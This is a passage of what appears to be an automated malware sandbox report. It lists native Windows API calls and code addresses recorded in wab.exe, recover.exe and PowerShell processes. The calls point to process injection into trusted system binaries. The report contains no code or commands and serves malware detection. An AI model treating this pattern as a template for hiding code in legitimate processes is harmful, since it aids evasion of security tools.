        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE35C0 NtCreateMutant,LdrInitializeThunk,10_2_1FDE35C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2FE0 NtCreateFile,10_2_1FDE2FE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2F90 NtProtectVirtualMemory,10_2_1FDE2F90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2FB0 NtResumeThread,10_2_1FDE2FB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2FA0 NtQuerySection,10_2_1FDE2FA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2F60 NtCreateProcessEx,10_2_1FDE2F60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2F30 NtCreateSection,10_2_1FDE2F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2EE0 NtQueueApcThread,10_2_1FDE2EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2E80 NtReadVirtualMemory,10_2_1FDE2E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2EA0 NtAdjustPrivilegesToken,10_2_1FDE2EA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2E30 NtWriteVirtualMemory,10_2_1FDE2E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2DD0 NtDelayExecution,10_2_1FDE2DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2DB0 NtEnumerateKey,10_2_1FDE2DB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE3D70 NtOpenThread,10_2_1FDE3D70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE3D10 NtOpenProcessToken,10_2_1FDE3D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2D10 NtMapViewOfSection,10_2_1FDE2D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2D00 NtSetInformationFile,10_2_1FDE2D00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2D30 NtUnmapViewOfSection,10_2_1FDE2D30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2CC0 NtQueryVirtualMemory,10_2_1FDE2CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2CF0 NtOpenProcess,10_2_1FDE2CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2CA0 NtQueryInformationToken,10_2_1FDE2CA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2C60 NtCreateKey,10_2_1FDE2C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2C00 NtQueryInformationProcess,10_2_1FDE2C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2BF0 NtAllocateVirtualMemory,10_2_1FDE2BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2BE0 NtQueryValueKey,10_2_1FDE2BE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2B80 NtQueryInformationFile,10_2_1FDE2B80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2BA0 NtEnumerateValueKey,10_2_1FDE2BA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2AD0 NtReadFile,10_2_1FDE2AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2AF0 NtWriteFile,10_2_1FDE2AF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2AB0 NtWaitForSingleObject,10_2_1FDE2AB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE39B0 NtGetContextThread,10_2_1FDE39B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE4650 NtSuspendThread,10_2_1FDE4650
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE4340 NtSetContextThread,10_2_1FDE4340
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE3090 NtSetValueKey,10_2_1FDE3090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE3010 NtOpenDirectoryObject,10_2_1FDE3010
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B4340 NtSetContextThread,LdrInitializeThunk,13_2_034B4340
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B3090 NtSetValueKey,LdrInitializeThunk,13_2_034B3090
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B4650 NtSuspendThread,LdrInitializeThunk,13_2_034B4650
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B35C0 NtCreateMutant,LdrInitializeThunk,13_2_034B35C0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2B60 NtClose,LdrInitializeThunk,13_2_034B2B60
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2BE0 NtQueryValueKey,LdrInitializeThunk,13_2_034B2BE0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_034B2BF0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_034B2BA0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2AD0 NtReadFile,LdrInitializeThunk,13_2_034B2AD0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2AF0 NtWriteFile,LdrInitializeThunk,13_2_034B2AF0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B39B0 NtGetContextThread,LdrInitializeThunk,13_2_034B39B0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2F30 NtCreateSection,LdrInitializeThunk,13_2_034B2F30
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2FE0 NtCreateFile,LdrInitializeThunk,13_2_034B2FE0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2FB0 NtResumeThread,LdrInitializeThunk,13_2_034B2FB0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2EE0 NtQueueApcThread,LdrInitializeThunk,13_2_034B2EE0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_034B2E80
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2D10 NtMapViewOfSection,LdrInitializeThunk,13_2_034B2D10
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_034B2D30
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2DD0 NtDelayExecution,LdrInitializeThunk,13_2_034B2DD0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_034B2DF0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2C60 NtCreateKey,LdrInitializeThunk,13_2_034B2C60
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_034B2C70
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_034B2CA0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B3010 NtOpenDirectoryObject,13_2_034B3010
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2B80 NtQueryInformationFile,13_2_034B2B80
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2AB0 NtWaitForSingleObject,13_2_034B2AB0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2F60 NtCreateProcessEx,13_2_034B2F60
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2F90 NtProtectVirtualMemory,13_2_034B2F90
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2FA0 NtQuerySection,13_2_034B2FA0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2E30 NtWriteVirtualMemory,13_2_034B2E30
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2EA0 NtAdjustPrivilegesToken,13_2_034B2EA0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B3D70 NtOpenThread,13_2_034B3D70
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2D00 NtSetInformationFile,13_2_034B2D00
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B3D10 NtOpenProcessToken,13_2_034B3D10
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2DB0 NtEnumerateKey,13_2_034B2DB0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2C00 NtQueryInformationProcess,13_2_034B2C00
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2CC0 NtQueryVirtualMemory,13_2_034B2CC0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B2CF0 NtOpenProcess,13_2_034B2CF0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D176A0 NtReadFile,13_2_02D176A0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D17790 NtDeleteFile,13_2_02D17790
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D17540 NtCreateFile,13_2_02D17540
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D17830 NtClose,13_2_02D17830
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D17980 NtAllocateVirtualMemory,13_2_02D17980
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348BD8822_2_00007FFD348BD882
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348BCAD62_2_00007FFD348BCAD6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34983DF62_2_00007FFD34983DF6
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02D197105_2_02D19710
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_081010105_2_08101010
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08100CC85_2_08100CC8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_081018E05_2_081018E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA2FC810_2_1FDA2FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBCFE010_2_1FDBCFE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F9210_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6FFB110_2_1FE6FFB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE24F4010_2_1FE24F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD0F3010_2_1FDD0F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6FF0910_2_1FE6FF09
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDF2F2810_2_1FDF2F28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6EEDB10_2_1FE6EEDB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC2E9010_2_1FDC2E90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB9EB010_2_1FDB9EB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6CE9310_2_1FE6CE93
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0E5910_2_1FDB0E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6EE2610_2_1FE6EE26
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCFDC010_2_1FDCFDC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAADE010_2_1FDAADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC8DBF10_2_1FDC8DBF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE67D7310_2_1FE67D73
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D4010_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE61D5A10_2_1FE61D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBAD0010_2_1FDBAD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6FCF210_2_1FE6FCF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA0CF210_2_1FDA0CF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB510_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE29C3210_2_1FE29C32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0C0010_2_1FDB0C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE25BF010_2_1FE25BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDEDBF910_2_1FDEDBF9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE66BD710_2_1FE66BD7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCFB8010_2_1FDCFB80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6FB7610_2_1FE6FB76
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6AB4010_2_1FE6AB40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5DAC610_2_1FE5DAC6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4DAAC10_2_1FE4DAAC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA8010_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDF5AA010_2_1FDF5AA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE23A6C10_2_1FE23A6C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE67A4610_2_1FE67A46
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6FA4910_2_1FE6FA49
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE7A9A610_2_1FE7A9A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB29A010_2_1FDB29A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB995010_2_1FDB9950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCB95010_2_1FDCB950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC696210_2_1FDC6962
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDE8F010_2_1FDDE8F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB38E010_2_1FDB38E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD968B810_2_1FD968B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB284010_2_1FDB2840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBA84010_2_1FDBA840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1D80010_2_1FE1D800
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAC7C010_2_1FDAC7C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6F7B010_2_1FE6F7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD475010_2_1FDD4750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB077010_2_1FDB0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE616CC10_2_1FE616CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCC6E010_2_1FDCC6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4D5B010_2_1FE4D5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE7059110_2_1FE70591
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6757110_2_1FE67571
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB053510_2_1FDB0535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5E4F610_2_1FE5E4F6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6244610_2_1FE62446
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA146010_2_1FDA1460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6F43F10_2_1FE6F43F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE703E610_2_1FE703E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBE3F010_2_1FDBE3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDF739A10_2_1FDF739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9D34C10_2_1FD9D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6A35210_2_1FE6A352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6132D10_2_1FE6132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE512ED10_2_1FE512ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCB2C010_2_1FDCB2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB52A010_2_1FDB52A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5027410_2_1FE50274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE681CC10_2_1FE681CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE701AA10_2_1FE701AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBB1B010_2_1FDBB1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE7B16B10_2_1FE7B16B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9F17210_2_1FD9F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE516C10_2_1FDE516C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE3815810_2_1FE38158
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA010010_2_1FDA0100
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4A11810_2_1FE4A118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6F0E010_2_1FE6F0E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE670E910_2_1FE670E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB70C010_2_1FDB70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5F0CC10_2_1FE5F0CC
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353A35213_2_0353A352
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0346D34C13_2_0346D34C
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353132D13_2_0353132D
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_035403E613_2_035403E6
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348E3F013_2_0348E3F0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034C739A13_2_034C739A
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0352027413_2_03520274
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0349B2C013_2_0349B2C0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_035212ED13_2_035212ED
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034852A013_2_034852A0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034B516C13_2_034B516C
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0346F17213_2_0346F172
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0354B16B13_2_0354B16B
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0347010013_2_03470100
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0351A11813_2_0351A118
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_035381CC13_2_035381CC
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348B1B013_2_0348B1B0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_035401AA13_2_035401AA
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034870C013_2_034870C0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0352F0CC13_2_0352F0CC
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353F0E013_2_0353F0E0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_035370E913_2_035370E9
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034A475013_2_034A4750
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348077013_2_03480770
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0347C7C013_2_0347C7C0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353F7B013_2_0353F7B0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_035316CC13_2_035316CC
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0349C6E013_2_0349C6E0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353757113_2_03537571
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348053513_2_03480535
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0354059113_2_03540591
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0351D5B013_2_0351D5B0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353244613_2_03532446
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0347146013_2_03471460
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353F43F13_2_0353F43F
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0352E4F613_2_0352E4F6
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353AB4013_2_0353AB40
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353FB7613_2_0353FB76
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03536BD713_2_03536BD7
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034BDBF913_2_034BDBF9
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0349FB8013_2_0349FB80
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03537A4613_2_03537A46
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353FA4913_2_0353FA49
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034F3A6C13_2_034F3A6C
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0352DAC613_2_0352DAC6
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0347EA8013_2_0347EA80
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034C5AA013_2_034C5AA0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0351DAAC13_2_0351DAAC
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348995013_2_03489950
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0349B95013_2_0349B950
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0349696213_2_03496962
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034829A013_2_034829A0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0354A9A613_2_0354A9A6
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348284013_2_03482840
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348A84013_2_0348A840
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034838E013_2_034838E0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034AE8F013_2_034AE8F0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034668B813_2_034668B8
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034F4F4013_2_034F4F40
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353FF0913_2_0353FF09
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034A0F3013_2_034A0F30
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03472FC813_2_03472FC8
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348CFE013_2_0348CFE0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03481F9213_2_03481F92
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353FFB113_2_0353FFB1
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03480E5913_2_03480E59
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353EE2613_2_0353EE26
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353EEDB13_2_0353EEDB
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353CE9313_2_0353CE93
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03492E9013_2_03492E90
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03489EB013_2_03489EB0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03483D4013_2_03483D40
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03531D5A13_2_03531D5A
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03537D7313_2_03537D73
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0348AD0013_2_0348AD00
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0349FDC013_2_0349FDC0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0347ADE013_2_0347ADE0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03498DBF13_2_03498DBF
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03480C0013_2_03480C00
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034F9C3213_2_034F9C32
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_0353FCF213_2_0353FCF2
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03470CF213_2_03470CF2
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_03520CB513_2_03520CB5
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D011E013_2_02D011E0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02CFC3C813_2_02CFC3C8
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02CFC3D013_2_02CFC3D0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02CFA67013_2_02CFA670
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02CFC5F013_2_02CFC5F0
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D19C5013_2_02D19C50
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D02D1013_2_02D02D10
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D02D0B13_2_02D02D0B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 1FDF7E54 appears 96 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 1FDE5130 appears 36 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 1FE1EA12 appears 86 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 1FD9B970 appears 268 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 1FE2F290 appears 105 times
        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 034EEA12 appears 84 times
        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 034C7E54 appears 88 times
